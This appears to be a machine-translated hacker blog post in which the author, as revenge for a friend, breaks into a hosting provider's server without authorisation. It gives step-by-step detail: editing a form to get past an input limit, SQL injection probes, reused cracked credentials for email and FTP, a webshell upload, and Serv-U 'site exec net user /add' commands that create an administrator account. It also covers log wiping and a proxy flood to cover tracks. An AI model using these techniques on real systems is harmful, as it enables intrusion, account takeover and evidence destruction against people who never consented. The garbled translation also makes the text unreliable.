One day talk with friends about the issue of blog record, inadvertently mentioned the space provider IDC. Speaking of IDC, I did not expect a friend has a very unpleasant experience.
The thing is this: At that time he was also inexperienced, want to choose a virtual host to do the site, of course, out of habit, he provided his own virtual host space services to the server did a security check, the result he got the space provider Web directory permissions, so ... Give yourself a little bit of time to add a year. Did not expect to be found by his space provider, closed a friend's space and FTP account. Later he looked, this space business even Electronic Business license (ICP Card) are not! Sweat ing ....
But it is said that later the server enhanced security, configuration is not bad! Since you are not only illegal but also offended me that cute can not be a lovely friend, then free to do a safety test for you!
Nonsense not to say, since friends think his security can also, that system scanning this thing is not necessary to do, directly look at the Web security! Find and find friends, find a good friend ... Dizzy! The main station security does make sense, filtration is very strict! Again in Domain 3.0 to see the next.
Halo, so many virtual host with their own station put together--really make money ah! Okay, here we go. Import URL for path scanning, sweep out a few upfile.asp upload.asp, try to upload, both failed (this is not surprising, after all, is very old hole). Since this is not possible, we look again and tell you that I have patience.
Random from Domain 3.0 left a stand in, is an online shopping site, there are ICP card! SORRY SORRY My goal is not you, just borrow a Webshell use it! After the Dickens explained clearly, began to detect ...
First find bbs--found no, but saw a message board, yes! It's you, let's take a look. Open the general look, the message board is simply no longer simple, tried a few "and 1=1", "and 1=2" did not find the problem. Storm database path also don't think, this BT IDC has all done the error processing, return the custom page, so even if the error is not get useful information (but if the MSSQL database in the injection point will have a solution to this problem)! This time, the eyes fell to the "search message" on. Turn it on, my gut tells me there's a problem.
See a message in front, the key word is "popularity", then we first search in the search bar "popular", return to the normal page.
Then when I wanted to construct the detection statement there was a small problem, the query box has a character length limit. But this little case!. We save the current page source to the local, search action to find the following statement:
Original code:
------------------------------------------------------------------------------------------
<form onsubmit= "return check (This)" Action=searchresult.asp method=post>
<table class=lybtable height=64 cellspacing=0 cellpadding=0 width=650
Align=center>
<TBODY>
<TR>
<TD width= "100%" height=64>
<div align=center><font color= #000000 > <B> Query way:</b> <select size=1
name=classid> <option selected> message content </OPTION> <OPTION> reply content </OPTION>
<OPTION> name </OPTION></SELECT> keywords: <input maxlength=12 size=28
name=keyword> <input class=noborder accesskey=s type=submit value= query (s) name=b1>
</FONT></DIV></TD></TR></TBODY></TABLE></FORM>
-----------------------------------------------------------------------------------------
We need to change a few places here, change "action=searchresult.asp" to "action=http://www.xxx.com/lyb/searchresult.asp" (Here I hide the original address, In order to protect themselves and to protect the site, of course, can not forget to change the most important things: "maxlength=12" changed to "maxlength=152", the revised code is as follows:
------------------------------------------------------------------------------------------
<form onsubmit= "return check (this)" action=http://www.xxx.com/lyb/searchresult.asp
Method=post>
<table class=lybtable height=64 cellspacing=0 cellpadding=0 width=650
Align=center>
<TBODY>
<TR>
<TD width= "100%" height=64>
<div align=center><font color= #000000 > <B> Query way:</b> <select size=1
name=classid> <option selected> message content </OPTION> <OPTION> reply content </OPTION>
<OPTION> name </OPTION></SELECT> keywords: <input maxlength=152 size=28
name=keyword> <input class=noborder accesskey=s type=submit value= query (s) name=b1>
</FONT></DIV></TD></TR></TBODY></TABLE></FORM>
------------------------------------------------------------------------------------------
OK, then we can submit it locally! Open the modified page and query in the search box: "Popular% ' and 1=1 and '% ' = '"-returns to the normal page.
Then we try to query: "Popular% ' and 1=2 and '% ' = '"--Error! There is a problem.
Okay, now that we've found a breakthrough, let's go! Manual guess too tired, give Nbsi 2. We construct the following url:http://www.xxx.com/lyb/searchresult.asp?classid= message content &keyword= popularity, in the keyword input the normal page of a word, I choose here "2005", OK, Go! Command, NBSI 2 run fast, not long before the password came out. Halo, MD5 encryption, but it does not matter, suddenly cracked out.
Do not sweep the path, the page directly on the webmaster login link, we successfully login! However, the situation is not very optimistic, the background function is simply can not be simple, try to get a webshell don't say it's not easy! Thinking a turn, sweep the shopping system backstage (originally also want to like the message board as directly to find an administrator login link, but can't find)! The scan result is unfortunate, the backstage path we do not know! Is there no way to get here? The way is not no, but you can not find it! We have noticed here.
Administrator of the information included in the mail account, holding a try attitude, I try to login to the station administrator's mailbox-unexpectedly successful! Quit now, what do you think? Yes, FTP account! Successfully connected with the ftp! of the space merchant by the account number in front of the mailbox @ and the password we cracked before. And then what? Upload Webshell, of course!
I'm going to get an ocean. 2006 Network Ann China Zrrrshoo Personal Edition, Access links, not killed, success. A rough look at the following directory settings, the standard virtual host rights allocation: Each space run independently, folder name is domain name, can not traverse other site directory, CDE partition root directory without permission to browse! A "net user", as expected, unable to execute! Try to jump to "c:\winnt\system32\inetsrv\data\", Success! Upload a renamed Cmd.exe, in the ocean specify the path "c:\winnt\system32\inetsrv\data\cmd.exe/c" execute command-Success! "Net start", again as expected, the server is really a serv-u obediently lying there, waiting to give us elevated privileges. But don't be optimistic, before you succeed, nothing is certain! "Netstat-an": Print into the eye of the inclusion of a "43958", it seems not to imagine the complexity! Then the directory jumps to "C:\Documents and Settings\All users\" Start "menu \ Program \" Find the Serv-u directory, go in and download the shortcut back! " Know his serv-u installation path: "D:\serv-U\", see if you can jump into-success! Is the old routine, write new users to "Servudaemon.ini" ready to leave, unexpectedly prompted a mistake! Depressed, it seems that there is no write permission ...
But something surprising happened, originally thought should have a firewall filter except a few outside all ports, did not expect to upload fpipe, forwarding the high-end port can directly connect, that also said what, local new FTP domain, remote connection management, add users, ftp up "quote site exec net user zrrrshoo /add ";" Quote site exec net user zrrrshoo zrrr ";" quote site exec net localgroup administrators Zrrrshoo /add ", he has 3389, I am afraid to do the login restrictions, but the fact that my worries are redundant! Just sign in. Okay, security matters, clear all logs, and then open a Challengecollapsar, with 30 agents to transform the path access 15 minutes (mainly to keep the Web log empty), ok! Give him to his friend tomorrow.
